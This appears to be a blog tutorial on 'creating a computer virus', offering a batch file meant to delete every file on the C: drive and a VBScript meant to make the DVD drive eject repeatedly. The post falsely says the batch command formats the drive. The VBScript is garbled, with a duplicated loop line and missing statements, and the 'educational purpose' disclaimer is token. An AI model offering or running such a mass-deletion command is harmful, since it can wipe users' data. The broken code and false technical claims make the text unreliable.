When there is a virus attack on your laptop or PC. You just format your laptop and start your work again. But have you ever thought how that virus is made? Those virus are actually a program that destroys your PC. Well, here we will share How to create a computer virus in a matter of seconds.
This is just for educational purpose. You should not use this trick for the unethical purpose.
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So let’s have a look at
How To Create A Computer Virus In A Matter Of Seconds
First and foremost thing you need to do is to open notepad. For that, you need to click on start and then search for notepad and hit enter.

How To Create A Computer Virus In A Matter Of Seconds
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Just copy and paste this code below in the notepad file.
@Echo off
Del C: *.* |yHow To Create A Computer Virus In A Matter Of Seconds
Now save that file with any name. But with .bat extension. In this case, we kept virus.bat

How To Create A Computer Virus In A Matter Of Seconds
Now run the .bat file and it will format your C drive.
Don’t double click on your PC as it will format your C drive.
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We have another trick here.
This trick will make your DVD drives eject automatically.
Click on start button and search for notepad. And hit enter.

How To Create A Computer Virus In A Matter Of Seconds
Next, copy and paste the below code. And save it to the name you like. But with the extension of .vbs. for instance, we can keep CD-ROM.vbs
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
For i = 0 to colCDROMs.Count – 1
End If
wscript.sleep 5000
Double click on the file and you will be amazed to see that your DVD drive open and close.

How To Create A Computer Virus In A Matter Of Seconds
To stop the virus. Open task manager and select process tab and end the wscript.exe file.
This is all about the virus which is harmless to your computer. As I said virus are programs that are created by a hacker and then you to hack your PC. So today you know how to create a virus in a matter of seconds. If you liked this article, then share with your friends and let your friends.
“Do at your own risk. We are not responsible for your loss”.
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